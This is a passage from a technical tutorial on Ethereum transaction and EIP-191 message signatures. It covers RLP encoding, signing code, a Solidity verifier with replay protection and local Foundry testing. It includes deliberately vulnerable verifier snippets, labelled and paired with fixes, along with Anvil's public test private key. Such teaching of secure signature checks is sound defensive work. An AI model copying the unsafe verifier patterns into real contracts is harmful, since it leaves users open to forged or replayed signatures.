chainId     → Network identifier (1=mainnet, 5=goerli, etc.)
```

Every field matters. Modify one byte, change the nonce from 42 to 43, bump the gasPrice by 1 wei, and you&apos;ve created a completely different transaction with a completely different signature.

But Ethereum nodes can&apos;t process a JavaScript object. They need raw bytes. This is where **RLP encoding** enters.

### RLP: Ethereum&apos;s Serialization Language

RLP (Recursive Length Prefix) is Ethereum&apos;s data packing format, defined in [Appendix B of the Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf). It&apos;s how complex nested data structures get flattened into deterministic byte sequences that every node interprets identically.

The [specification](https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp/) defines encoding rules for two data types:

**Strings** (raw byte sequences):
- Single byte [0x00-0x7f]: The byte is its own encoding
- Strings 0-55 bytes: `[0x80 + length] + data`
- Strings &gt;55 bytes: `[0xb7 + length_of_length] + length + data`

**Lists** (arrays of items):
- Payload 0-55 bytes: `[0xc0 + payload_length] + concatenated_items`
- Payload &gt;55 bytes: `[0xf7 + length_of_length] + payload_length + concatenated_items`

The first byte tells you what follows. A byte in [0x00-0x7f] is itself a single-byte string. Bytes in [0x80-0xbf] start string encodings. Bytes in [0xc0-0xff] start lists.

**Why does this matter for security?** Because RLP is deterministic. Given identical input, every implementation produces identical output. This means signatures are bound to the *exact* transaction structure. No ambiguity, no interpretation needed.

Let&apos;s see RLP in action:

```javascript
// ethers v6 ships its own RLP helpers (encodeRlp / decodeRlp),
// so no separate package is needed
const { ethers } = require(&apos;ethers&apos;);
const { encodeRlp } = ethers;

// RLP encodes strings by prepending length
function demonstrateRLP() {
  // Short string (&lt; 55 bytes)
  const str = &quot;hello&quot;;
  const strBytes = ethers.toUtf8Bytes(str);
  const encoded = encodeRlp(strBytes);
  console.log(&quot;String:&quot;, str);
  console.log(&quot;RLP encoded:&quot;, encoded);
  // Output: 0x8568656c6c6f
  // Breakdown: 0x85 = (0x80 + 5 byte length), then &quot;hello&quot; in hex

  // List of strings
  const list = [&quot;cat&quot;, &quot;dog&quot;];
  const encodedList = encodeRlp([
    ethers.toUtf8Bytes(list[0]),
    ethers.toUtf8Bytes(list[1])
  ]);
  console.log(&quot;\nList:&quot;, list);
  console.log(&quot;RLP encoded:&quot;, encodedList);
  // Output: 0xc88363617483646f67
  // Breakdown: 0xc8 = (0xc0 + 8 byte payload), then encoded items
}

demonstrateRLP();
```

![](/content/images/2025/11/rlp-encoding.png)

*Output after running the script*

That first byte, 0x85 for the string, 0xc8 for the list, is the RLP prefix. It tells decoders how many bytes follow and what type of data structure to expect.

### How Transactions Get RLP-Encoded and Signed

Here&apos;s the complete flow from transaction parameters to broadcast-ready signature:

![](/content/images/2025/11/rlp-encoding.svg)

*RLP Encoding*

Let&apos;s manually construct and sign a transaction to see RLP encoding in practice:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete transaction signing example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function manualTransactionSigning() {
  const wallet = ethers.Wallet.createRandom();
  const recipientWallet = ethers.Wallet.createRandom();

  console.log(&quot;Wallet:&quot;, wallet.address);
  console.log(&quot;Private key:&quot;, wallet.privateKey);

  // Transaction parameters for 1 ETH transfer
  const txParams = {
    nonce: 0,
    gasPrice: ethers.parseUnits(&apos;20&apos;, &apos;gwei&apos;),
    gasLimit: 21000,
    to: recipientWallet.address,
    value: ethers.parseEther(&apos;1.0&apos;),
    data: &apos;0x&apos;,
    chainId: 1  // Mainnet
  };

  console.log(&quot;\nTransaction parameters:&quot;);
  console.log(JSON.stringify(txParams, (key, value) =&gt;
    typeof value === &apos;bigint&apos; ? value.toString() : value, 2));

  // Get unsigned serialized transaction (RLP-encoded)
  const unsignedTx = ethers.Transaction.from(txParams).unsignedSerialized;
  console.log(&quot;\nRLP-encoded (unsigned):&quot;, unsignedTx);

  // Hash the RLP-encoded transaction
  const txHash = ethers.keccak256(unsignedTx);
  console.log(&quot;Transaction hash (signed digest):&quot;, txHash);

  // Sign the transaction
  const signedTx = await wallet.signTransaction(txParams);
  console.log(&quot;\nSigned transaction (RLP + signature):&quot;, signedTx);

  // Parse signature components
  const parsedTx = ethers.Transaction.from(signedTx);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r:&quot;, parsedTx.signature.r);
  console.log(&quot;s:&quot;, parsedTx.signature.s);
  console.log(&quot;v:&quot;, parsedTx.signature.v);

  // Verify signature by recovering signer
  const recoveredSigner = parsedTx.from;
  console.log(&quot;\nRecovered signer:&quot;, recoveredSigner);
  console.log(&quot;Signature valid:&quot;, recoveredSigner === wallet.address);
}

manualTransactionSigning();
```

&lt;/details&gt;

![](/content/images/2025/11/transaction_signing.png)

*Manual transaction*



Notice what happened:
1. **RLP encoding** transformed our transaction object into a deterministic byte array
2. **Keccak-256** hashed that byte array into a 32-byte digest
3. **ECDSA signing** generated r, s, v from the hash and private key
4. **Serialization** combined the original RLP transaction with the signature
5. **Recovery** extracted the signer&apos;s address from the signature

This entire process happens automatically every time you click &quot;Confirm&quot; in your wallet. The signature is cryptographically bound to the RLP-encoded transaction. Change one field, and the signature breaks.

### Built-in Protection Mechanisms

Transaction signatures include two built-in replay protections:

**Nonce**: Each address maintains a transaction counter. An address whose next nonce is 42 can only execute transaction #42 next. You can&apos;t replay transaction #41 (already executed) or skip to #43 (nonce mismatch). This prevents attackers from rebroadcasting old transactions.

**ChainId**: [EIP-155](https://eips.ethereum.org/EIPS/eip-155) embeds the network identifier into the signature. A transaction signed for Ethereum mainnet (chainId=1) cannot execute on Polygon (chainId=137) or any other network. This prevents cross-chain replay attacks.

These protections are baked into the RLP structure. They&apos;re automatic, mandatory, and verified by every node in the network.

Message signatures have none of this. That&apos;s why they require manual security implementation.

## Message Signatures: EIP-191 and Manual Verification

### Why Message Signatures Exist

Transaction signatures cost gas. They modify blockchain state. They&apos;re permanent.

Sometimes you just need to prove ownership without spending money:
- &quot;Sign in with Ethereum&quot; authentication
- DAO voting (collect signatures off-chain, execute once)
- NFT minting allowlists (prove you&apos;re on the list without paying gas)
- Gasless token approvals (EIP-2612 Permit)

Message signatures serve this purpose. They&apos;re free, off-chain, and can be verified by anyone with the signature and original message.

But unlike transactions, message signatures have no automatic verification. No nodes check them. No built-in replay protection. No mandatory nonce or chainId.

This is where [EIP-191](https://eips.ethereum.org/EIPS/eip-191) enters.

### EIP-191: Structured Signed Data Standard

EIP-191 defines the format for all signed data in Ethereum. The core structure is:

```
0x19 &lt;version byte&gt; &lt;version-specific data&gt; &lt;data to sign&gt;
```

**Why `0x19`?** Because it ensures signed data is not valid RLP. In RLP, single bytes in [0x00-0x7f] are their own encoding. Bytes in [0x80-0xff] are string/list prefixes. The byte `0x19` sits in the single-byte range, which means if RLP-decoded, it would be interpreted as a standalone byte (ASCII value 25), not as the start of a valid transaction structure.

This prevents a signed message from being mistaken for a signed transaction. It&apos;s domain separation at the byte level.

EIP-191 defines three version bytes:

![](/content/images/2025/11/eip-191.svg)

*Eip-191 version bytes*


**Version 0x00 - Data with Intended Validator:**
Format: `0x19 0x00 &lt;validator address&gt; &lt;data&gt;`

Used when a specific smart contract will verify the signature. The validator address (20 bytes) is included in the signed data, binding the signature to that contract. Multisig wallets use this to ensure pre-signed transactions only execute through the intended wallet contract.

**Version 0x01 - Structured Data (EIP-712):**
Format: `0x19 0x01 &lt;domainSeparator&gt; &lt;hashStruct&gt;`

The most sophisticated version. Used for signing typed, structured data like token permits (EIP-2612) and meta-transactions. We&apos;ll cover this in detail in a later post.

**Version 0x45 - Personal Sign:**
Format: `0x19 &apos;Ethereum Signed Message:\n&apos; &lt;length&gt; &lt;message&gt;`

This is what `wallet.signMessage()` uses. The complete prefix is `\x19Ethereum Signed Message:\n` followed by the message length as a string, then the message itself.

&gt;Note: The &quot;version byte 0x45&quot; is not a separate byte. It refers to the ASCII value of &apos;E&apos; in &quot;Ethereum&quot; (0x45 = &apos;E&apos;). The actual format starts with 0x19, then the string &quot;Ethereum...&quot; where &apos;E&apos; happens to be 0x45 in ASCII.

### Demonstrating the Personal Sign Prefix

Let&apos;s see exactly what gets constructed when you sign &quot;Login to dApp&quot;:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: EIP-191 prefix construction example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

function demonstrateEIP191PersonalSign() {
  const message = &quot;Login to dApp&quot;;

  console.log(&quot;Original message:&quot;, message);
  console.log(&quot;Message length:&quot;, message.length, &quot;bytes&quot;);

  // EIP-191 version 0x45 construction
  const prefix = &quot;\x19Ethereum Signed Message:\n&quot;;
  const messageBytes = ethers.toUtf8Bytes(message);
  const lengthStr = String(messageBytes.length);
  const lengthBytes = ethers.toUtf8Bytes(lengthStr);

  // Concatenate: prefix + length (as string) + message
  const prefixedMessage = ethers.concat([
    ethers.toUtf8Bytes(prefix),
    lengthBytes,
    messageBytes
  ]);

  console.log(&quot;\nEIP-191 construction:&quot;);
  console.log(&quot;1. Prefix (\\x19Ethereum Signed Message:\\n):&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(ethers.toUtf8Bytes(prefix)));
  console.log(&quot;2. Length (as string &apos;13&apos;):&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(lengthBytes));
  console.log(&quot;3. Message:&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(messageBytes));
  console.log(&quot;\n4. Complete prefixed message:&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(prefixedMessage));

  // Hash the prefixed message (this is what gets signed)
  const messageHash = ethers.keccak256(prefixedMessage);
  console.log(&quot;\n5. Keccak-256 hash (signed digest):&quot;);
  console.log(&quot;   &quot;, messageHash);

  // Verify against ethers.js helper
  const expectedHash = ethers.hashMessage(message);
  console.log(&quot;\n6. ethers.hashMessage() output:&quot;);
  console.log(&quot;   &quot;, expectedHash);
  console.log(&quot;\nMatch:&quot;, messageHash === expectedHash);
}

demonstrateEIP191PersonalSign();
```

&lt;/details&gt;


![](/content/images/2025/11/eip191.png)

*eip-191 prefix construction example*

This prefixed structure is what your private key actually signs. Not just &quot;Login to dApp&quot;, but the entire `0x19 &apos;Ethereum Signed Message:\n13Login to dApp&apos;` byte sequence.

The length is included as a string (&quot;13&quot;), not as a binary number. This means the length field itself varies in size depending on how many digits are needed. A 9-byte message has length &quot;9&quot; (1 byte). A 100-byte message has length &quot;100&quot; (3 bytes).

### Complete Message Signature Flow

Now let&apos;s sign a message and verify it:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Message signature and verification example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function completeMessageSignatureFlow() {
  const wallet = ethers.Wallet.createRandom();
  const message = &quot;Authorize withdrawal: 100 USDC&quot;;

  console.log(&quot;=== Message Signature Flow ===\n&quot;);
  console.log(&quot;Signer:&quot;, wallet.address);
  console.log(&quot;Message:&quot;, message);

  // Sign the message (wallet adds EIP-191 prefix automatically)
  const signature = await wallet.signMessage(message);
  console.log(&quot;\nSignature (65 bytes):&quot;, signature);

  // Decompose signature into components
  const sig = ethers.Signature.from(signature);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r (32 bytes):&quot;, sig.r);
  console.log(&quot;s (32 bytes):&quot;, sig.s);
  console.log(&quot;v (1 byte):&quot;, sig.v);

  // Verify by recovering signer
  const recoveredSigner = ethers.verifyMessage(message, signature);
  console.log(&quot;\n=== Verification ===&quot;);
  console.log(&quot;Expected signer:&quot;, wallet.address);
  console.log(&quot;Recovered signer:&quot;, recoveredSigner);
  console.log(&quot;Valid:&quot;, recoveredSigner === wallet.address);

  // Demonstrate signature-message binding
  const tamperedMessage = &quot;Authorize withdrawal: 1000 USDC&quot;;
  const recoveredFromTampered = ethers.verifyMessage(tamperedMessage, signature);
  console.log(&quot;\n=== Tamper Test ===&quot;);
  console.log(&quot;Tampered message:&quot;, tamperedMessage);
  console.log(&quot;Recovered signer:&quot;, recoveredFromTampered);
  console.log(&quot;Still valid:&quot;, recoveredFromTampered === wallet.address);
}

completeMessageSignatureFlow();
```

&lt;/details&gt;


![](/content/images/2025/11/sign-verification.png)

*Message Signature Verification Example*

Key observation: when we changed &quot;100 USDC&quot; to &quot;1000 USDC&quot;, the recovered address changed completely. The signature is cryptographically bound to the exact message. You cannot modify the message and reuse the signature.

But here&apos;s the dangerous part: **nothing prevents the signature from being reused with the original message**. If the verifying contract doesn&apos;t implement replay protection (nonces, deadlines, single-use flags), an attacker can submit the same signature repeatedly.

This is the fundamental difference from transaction signatures, which have mandatory nonce protection.

## Smart Contract Verification: On-Chain Implementation

### Complete Signature Verification Contract

Let&apos;s build a contract that verifies EIP-191 personal sign messages with proper security controls:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete SignatureVerifier contract (207 lines)&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @title SignatureVerifier
 * @notice Demonstrates secure message signature verification
 * @dev Implements EIP-191 version 0x45 (personal_sign) verification with replay protection
 */
contract SignatureVerifier {
    // SECURITY: Nonce tracking prevents replay attacks
    mapping(address =&gt; uint256) public nonces;

    // SECURITY: Track used signatures to prevent reuse
    mapping(bytes32 =&gt; bool) public usedSignatures;

    /**
     * @notice Verify an EIP-191 personal_sign message signature
     * @param message The original message that was signed
     * @param signature The 65-byte ECDSA signature (r + s + v)
     * @param expectedSigner The address that should have signed
     * @return bool True if signature is valid and from expected signer
     */
    function verifyPersonalSign(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public pure returns (bool) {
        // Reconstruct the EIP-191 prefixed message hash
        // Format: &quot;\x19Ethereum Signed Message:\n&quot; + len(message) + message
        bytes32 messageHash = getEthSignedMessageHash(message);

        // Recover signer from signature
        address recoveredSigner = recoverSigner(messageHash, signature);

        // SECURITY: Verify recovered signer matches expected
        return recoveredSigner == expectedSigner;
    }

    /**
     * @notice Verify signature with nonce-based replay protection
     * @param message The message to verify (must include nonce)
     * @param nonce The nonce value included in the message
     * @param signature The signature to verify
     * @param expectedSigner The expected signing address
     * @return bool True if valid
     * @dev The message must be constructed with the nonce before signing
     *      Example: &quot;Transfer 100 tokens. Nonce: 5&quot;
     *      The nonce parameter must match the value in the message and the stored nonce
     */
    function verifyWithNonce(
        string memory message,
        uint256 nonce,
        bytes memory signature,
        address expectedSigner
    ) public returns (bool) {
        // SECURITY: Validate nonce matches stored value
        require(nonce == nonces[expectedSigner], &quot;Invalid nonce&quot;);

        // SECURITY: Use standard EIP-191 hash (nonce must be in message text)
        bytes32 messageHash = getEthSignedMessageHash(message);

        // Recover and verify signer
        address recoveredSigner = recoverSigner(messageHash, signature);
        require(recoveredSigner == expectedSigner, &quot;Invalid signature&quot;);

        // SECURITY: Increment nonce to prevent replay
        nonces[expectedSigner]++;
        return true;
    }

    /**
     * @notice Verify signature with single-use enforcement
     * @param message The message to verify
     * @param signature The signature to verify (will be marked as used)
     * @param expectedSigner The expected signing address
     * @return bool True if valid
     */
    function verifyOnce(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public returns (bool) {
        bytes32 sigHash = keccak256(signature);

        // SECURITY: Ensure signature hasn&apos;t been used
        require(!usedSignatures[sigHash], &quot;Signature already used&quot;);

        // Verify the signature
        bytes32 messageHash = getEthSignedMessageHash(message);
        address recoveredSigner = recoverSigner(messageHash, signature);
        require(recoveredSigner == expectedSigner, &quot;Invalid signature&quot;);

        // SECURITY: Mark signature as used
        usedSignatures[sigHash] = true;
        return true;
    }

    /**
     * @notice Construct EIP-191 prefixed message hash
     * @param message The original message
     * @return bytes32 The Keccak-256 hash of the prefixed message
     */
    function getEthSignedMessageHash(string memory message)
        public
        pure
        returns (bytes32)
    {
        // EIP-191 version 0x45: &quot;\x19Ethereum Signed Message:\n&quot; + len + message
        bytes memory messageBytes = bytes(message);
        return keccak256(
            abi.encodePacked(
                &quot;\x19Ethereum Signed Message:\n&quot;,
                uintToString(messageBytes.length),
                messageBytes
            )
        );
    }

    /**
     * @notice Recover signer address from message hash and signature
     * @param messageHash The hash that was signed
     * @param signature The 65-byte signature (r + s + v)
     * @return address The recovered signer address
     */
    function recoverSigner(
        bytes32 messageHash,
        bytes memory signature
    ) public pure returns (address) {
        // SECURITY: Signature must be exactly 65 bytes
        require(signature.length == 65, &quot;Invalid signature length&quot;);

        // Extract r, s, v components
        bytes32 r;
        bytes32 s;
        uint8 v;

        // Use assembly for gas-efficient extraction
        // Memory layout: [32-byte length][32-byte r][32-byte s][1-byte v]
        assembly {
            // Load r: bytes 0-31 of signature data
            // Offset 32 skips the length prefix stored by Solidity
            r := mload(add(signature, 32))

            // Load s: bytes 32-63 of signature data
            // Offset 64 = 32 (length prefix) + 32 (r component)
            s := mload(add(signature, 64))

            // Load v: byte 64 of signature data
            // Offset 96 = 32 (length) + 32 (r) + 32 (s)
            // Use byte(0, ...) to extract only the first byte
            v := byte(0, mload(add(signature, 96)))
        }

        // SECURITY: Normalize v to 27 or 28
        // Some libraries return v as 0 or 1
        if (v &lt; 27) {
            v += 27;
        }
        require(v == 27 || v == 28, &quot;Invalid v value&quot;);

        // Call ecrecover precompile
        // VULNERABILITY WARNING: ecrecover returns address(0) on failure!
        address signer = ecrecover(messageHash, v, r, s);

        // SECURITY: Always check for zero address
        require(signer != address(0), &quot;Invalid signature&quot;);

        return signer;
    }

    /**
     * @notice Convert uint to string (helper for EIP-191 length encoding)
     * @param value The uint to convert
     * @return string The string representation
     */
    function uintToString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return &quot;0&quot;;
        }

        uint256 temp = value;
        uint256 digits;

        // Count digits
        while (temp != 0) {
            digits++;
            temp /= 10;
        }

        bytes memory buffer = new bytes(digits);

        // Convert each digit
        while (value != 0) {
            digits--;
            buffer[digits] = bytes1(uint8(48 + (value % 10)));
            value /= 10;
        }

        return string(buffer);
    }

    /**
     * @notice Get current nonce for an address
     * @param user The address to check
     * @return uint256 The current nonce
     */
    function getNonce(address user) public view returns (uint256) {
        return nonces[user];
    }
}
```

&lt;/details&gt;

This contract demonstrates three security patterns:

**1. Basic verification (`verifyPersonalSign`)**
- Reconstructs the EIP-191 prefix: `\x19Ethereum Signed Message:\n` + length + message
- Uses `ecrecover` to extract the signer
- Compares recovered signer to expected address
- **No replay protection** - signature can be reused

**2. Nonce-based verification (`verifyWithNonce`)**
- Requires nonce to be included in the message text before signing
- Example: &quot;Transfer 100 tokens. Nonce: 5&quot;
- **Validates nonce matches stored value** - rejects old or future nonces
- Increments nonce after successful verification
- **Prevents replay** - each nonce works only once sequentially
- Caller must provide the nonce value as a parameter for validation

**3. Single-use verification (`verifyOnce`)**
- Tracks signature hashes in a mapping
- Rejects signatures that have been used before
- **Alternative to nonces** - useful when signer doesn&apos;t track nonces

### Important ecrecover Behavior

The [Solidity documentation](https://docs.soliditylang.org/en/latest/units-and-global-variables.html) states that `ecrecover` &quot;returns zero on error&quot;. This is an important security consideration:

```solidity
// VULNERABILITY: Not checking for zero address
address signer = ecrecover(hash, v, r, s);
if (signer == expectedSigner) {
    // If ecrecover fails (returns 0x0), this check passes
    // when expectedSigner is also 0x0 (default value)!
}

// FIX: Always validate the recovered address
address signer = ecrecover(hash, v, r, s);
require(signer != address(0), &quot;Invalid signature&quot;);
require(signer == expectedSigner, &quot;Wrong signer&quot;);
```

According to [OpenZeppelin&apos;s ECDSA library documentation](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA), ecrecover can fail and return `address(0)` for several reasons:
- Invalid signature parameters
- Malformed signature data
- Incorrect message hash

Always check for the zero address before trusting the result.

### Deploying and Testing with Foundry

Let&apos;s deploy this contract to a local blockchain using Foundry&apos;s Anvil and test it with a real deployment. This gives you hands-on experience with on-chain signature verification.

#### Prerequisites

Install Foundry if you haven&apos;t already:
```bash
curl -L https://foundry.paradigm.xyz | bash
foundryup
```

#### Step 1: Start Local Blockchain (Anvil)

Open a terminal and start Anvil:
```bash
anvil
```

Anvil starts a local Ethereum node at `http://localhost:8545` with 10 pre-funded accounts. Keep this terminal open.

You&apos;ll see output with available accounts:
```
Available Accounts
==================
(0) 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 (10000 ETH)
(1) 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 (10000 ETH)
...

Private Keys
==================
(0) 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80
...
```

#### Step 2: Deploy the Contract

In a new terminal, deploy using `forge create`:

```bash
forge create $(pwd)/SignatureVerifier.sol:SignatureVerifier \
  --rpc-url http://localhost:8545 \
  --private-key 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80
```

The private key is Anvil&apos;s first default account (safe for local testing only).


![](/content/images/2025/11/deploy-contract.png)

*Deploy contract*


**Copy the &quot;Deployed to&quot; address** - you&apos;ll need it for testing.

#### Step 3: Test the Deployed Contract

Create a test script `test-contract.js`:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete contract testing script&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function testDeployedContract() {
  // Connect to local Anvil node
  const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
  const deployer = await provider.getSigner(0);

  // Create a test wallet for signing
  const testWallet = ethers.Wallet.createRandom().connect(provider);

  console.log(&quot;=== SignatureVerifier Contract Testing ===\n&quot;);
  console.log(&quot;Deployer:&quot;, await deployer.getAddress());
  console.log(&quot;Test wallet:&quot;, testWallet.address);
  console.log();

  // Contract ABI
  const abi = [
    &quot;function verifyPersonalSign(string memory message, bytes memory signature, address expectedSigner) public pure returns (bool)&quot;,
    &quot;function verifyWithNonce(string memory message, uint256 nonce, bytes memory signature, address expectedSigner) public returns (bool)&quot;,
    &quot;function verifyOnce(string memory message, bytes memory signature, address expectedSigner) public returns (bool)&quot;,
    &quot;function getNonce(address user) public view returns (uint256)&quot;
  ];

  // Replace with your deployed contract address
  const contractAddress = process.argv[2];
  if (!contractAddress) {
    console.error(&quot;Usage: node test-contract.js &lt;CONTRACT_ADDRESS&gt;&quot;);
    process.exit(1);
  }

  const contract = new ethers.Contract(contractAddress, abi, deployer);

  // Test 1: Basic signature verification
  console.log(&quot;=== Test 1: Basic Verification (verifyPersonalSign) ===&quot;);
  const message1 = &quot;Claim reward: 50 tokens&quot;;
  const signature1 = await testWallet.signMessage(message1);

  console.log(&quot;Message:&quot;, message1);
  console.log(&quot;Signature:&quot;, signature1.slice(0, 20) + &quot;...&quot;);

  const isValid = await contract.verifyPersonalSign(
    message1,
    signature1,
    testWallet.address
  );
  console.log(&quot;✓ Verification:&quot;, isValid ? &quot;PASS&quot; : &quot;FAIL&quot;);

  // Test with wrong signer
  const wrongAddress = await deployer.getAddress();
  const isInvalid = await contract.verifyPersonalSign(
    message1,
    signature1,
    wrongAddress
  );
  console.log(&quot;✓ Wrong signer rejected:&quot;, !isInvalid ? &quot;PASS&quot; : &quot;FAIL&quot;);
  console.log();

  // Test 2: Nonce-based verification
  console.log(&quot;=== Test 2: Nonce-Based Replay Protection ===&quot;);
  let nonce = await contract.getNonce(testWallet.address);
  console.log(&quot;Initial nonce:&quot;, nonce.toString());

  const message2 = `Transfer 100 tokens. Nonce: ${nonce}`;
  const signature2 = await testWallet.signMessage(message2);

  console.log(&quot;Message:&quot;, message2);

  // First submission - should succeed
  const tx1 = await contract.verifyWithNonce(
    message2,
    nonce,  // Pass nonce parameter
    signature2,
    testWallet.address
  );
  await tx1.wait();
  console.log(&quot;✓ First submission: PASS (tx:&quot;, tx1.hash.slice(0, 10) + &quot;...)&quot;);

  nonce = await contract.getNonce(testWallet.address);
  console.log(&quot;✓ Nonce incremented to:&quot;, nonce.toString());

  // Try replay - old nonce will be rejected
  console.log(&quot;Attempting replay with old nonce...&quot;);
  try {
    const tx2 = await contract.verifyWithNonce(
      message2,
      0,  // Old nonce - should fail
      signature2,
      testWallet.address
    );
    await tx2.wait();
    console.log(&quot;✗ SECURITY ISSUE: Replay succeeded (should have failed!)&quot;);
  } catch (error) {
    console.log(&quot;✓ Replay prevented:&quot;, error.reason || &quot;Invalid nonce&quot;);
  }
  console.log();

  // Test 3: Single-use signature
  console.log(&quot;=== Test 3: Single-Use Signature (verifyOnce) ===&quot;);
  const message3 = &quot;One-time action: Mint NFT&quot;;
  const signature3 = await testWallet.signMessage(message3);

  const tx3 = await contract.verifyOnce(
    message3,
    signature3,
    testWallet.address
  );
  await tx3.wait();
  console.log(&quot;✓ First use: PASS (tx:&quot;, tx3.hash.slice(0, 10) + &quot;...)&quot;);

  try {
    const tx4 = await contract.verifyOnce(message3, signature3, testWallet.address);
    await tx4.wait();
    console.log(&quot;✗ Signature reuse: FAIL (should have been prevented)&quot;);
  } catch (error) {
    console.log(&quot;✓ Signature reuse prevented:&quot;, error.reason || &quot;Signature already used&quot;);
  }
  console.log();

  console.log(&quot;=== All Tests Complete ===&quot;);
  console.log(&quot;Summary:&quot;);
  console.log(&quot;1. ✓ Basic verification works&quot;);
  console.log(&quot;2. ✓ Nonce-based replay protection works (replay rejected)&quot;);
  console.log(&quot;3. ✓ Single-use signature tracking works&quot;);
}

testDeployedContract().catch(console.error);
```

&lt;/details&gt;

Run the test script with your deployed contract address:
```bash
node test-contract.js 0x9A9f2CCfdE556A7E9Ff0848998Aa4a0CFD8863AE
```

![](/content/images/2025/11/demo.png)

*Testing SignatureVerifier contract with Foundry and Anvil*


This demonstrates three security patterns in action:

**1. `verifyPersonalSign`**: Basic verification with no replay protection. The same signature can be reused indefinitely. Use only when replay doesn&apos;t matter (e.g., read-only verification).

**2. `verifyWithNonce`**: Nonce-based replay protection. The function validates that the provided nonce matches the stored nonce before accepting the signature. After successful verification, it increments the nonce. This ensures signatures with old or future nonces are rejected, preventing replay attacks. Critical for financial operations.

**3. `verifyOnce`**: Single-use signature tracking. Each signature hash is stored after first use. Alternative to nonces when the signer doesn&apos;t track nonce state.

## Architectural Differences: Side-by-Side Comparison

Let&apos;s visualize the fundamental differences in how these signature types operate:


![](/content/images/2025/11/message-signature-diagram.svg)

*Message Signature Diagram*

![](/content/images/2025/11/transaction-signature-diagram.svg)

*Transaction Signature Diagram*



Notice the key difference: transaction signatures have automatic network verification. Message signatures require manual verification, which is where vulnerabilities enter.

### When to Use Each Type

**Use Transaction Signatures When:**
- Transferring ETH or tokens between addresses
- Calling state-changing smart contract functions
- Deploying new contracts
- You need automatic network-wide verification
- You need guaranteed replay protection
- Gas costs are acceptable

**Use Message Signatures When:**
- Implementing passwordless authentication (&quot;Sign in with Ethereum&quot;)
- Collecting off-chain votes or approvals (DAO governance)
- Creating gasless token approvals (EIP-2612 Permit)
- Building meta-transaction systems (covered in next post)
- Proving ownership without spending gas
- You need off-chain signature aggregation

**Never Use Message Signatures For:**
- Authorization without nonce/expiry/single-use protection
- Actions where replay would be catastrophic
- Systems where you can&apos;t clearly explain to users what they&apos;re authorizing
- Anything where &quot;replay this 1000 times&quot; would be devastating

## Common Verification Pitfalls

Understanding how to verify signatures is only half the battle. Let&apos;s examine two common implementation mistakes that create vulnerabilities.

### Vulnerability #1: Missing ecrecover Validation

```solidity
// VULNERABILITY: Not checking ecrecover return value
contract UnsafeVerifier {
    function verify(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public pure returns (bool) {
        bytes32 messageHash = getEthSignedMessageHash(message);
        (uint8 v, bytes32 r, bytes32 s) = splitSignature(signature);

        // VULNERABILITY: ecrecover returns address(0) on failure
        address signer = ecrecover(messageHash, v, r, s);

        // If expectedSigner is accidentally 0x0 (uninitialized),
        // this passes when it should fail!
        return signer == expectedSigner;
    }
}
```

**The Attack:**
If `expectedSigner` is `address(0)` (uninitialized variable, constructor bug, etc.) and the signature is malformed, `ecrecover` returns `address(0)`, the comparison passes, and invalid signatures are accepted.

**The Fix:**
```solidity
// FIX: Always validate ecrecover output
function verify(
    string memory message,
    bytes memory signature,
    address expectedSigner
) public pure returns (bool) {
    bytes32 messageHash = getEthSignedMessageHash(message);
    (uint8 v, bytes32 r, bytes32 s) = splitSignature(signature);
    address signer = ecrecover(messageHash, v, r, s);

    // SECURITY: Check for ecrecover failure
    require(signer != address(0), &quot;Invalid signature&quot;);

    // SECURITY: Check for uninitialized expectedSigner
    require(expectedSigner != address(0), &quot;Invalid expected signer&quot;);

    return signer == expectedSigner;
}
```

### Vulnerability #2: Incorrect Prefix Reconstruction

```solidity
// VULNERABILITY: Missing EIP-191 prefix
contract WrongPrefixVerifier {
    function verify(
        string memory message,
        bytes memory signature
    ) public pure returns (bool) {
        // VULNERABILITY: Hashing raw message without EIP-191 prefix
        bytes32 messageHash = keccak256(bytes(message));

        // This will NEVER match signatures from standard wallets
        // because wallets add &quot;\x19Ethereum Signed Message:\n&lt;length&gt;&quot;
        address signer = recoverSigner(messageHash, signature);
        return signer == msg.sender;
    }
}
```

**The Problem:**
Standard Ethereum wallets (MetaMask, Ledger, etc.) automatically add the EIP-191 prefix when signing messages. If your contract hashes the raw message without the prefix, signature verification will always fail. Users can&apos;t authenticate, and the system is broken.

**The Fix:**
Always reconstruct the exact format wallets use:

```solidity
// FIX: Add EIP-191 prefix
function verify(
    string memory message,
    bytes memory signature
) public pure returns (bool) {
    // SECURITY: Include EIP-191 prefix to match wallet behavior
    bytes32 messageHash = keccak256(
        abi.encodePacked(
            &quot;\x19Ethereum Signed Message:\n&quot;,
            uintToString(bytes(message).length),
            message
        )
    );

    address signer = recoverSigner(messageHash, signature);
    require(signer != address(0), &quot;Invalid signature&quot;);
    return signer == msg.sender;
}
```
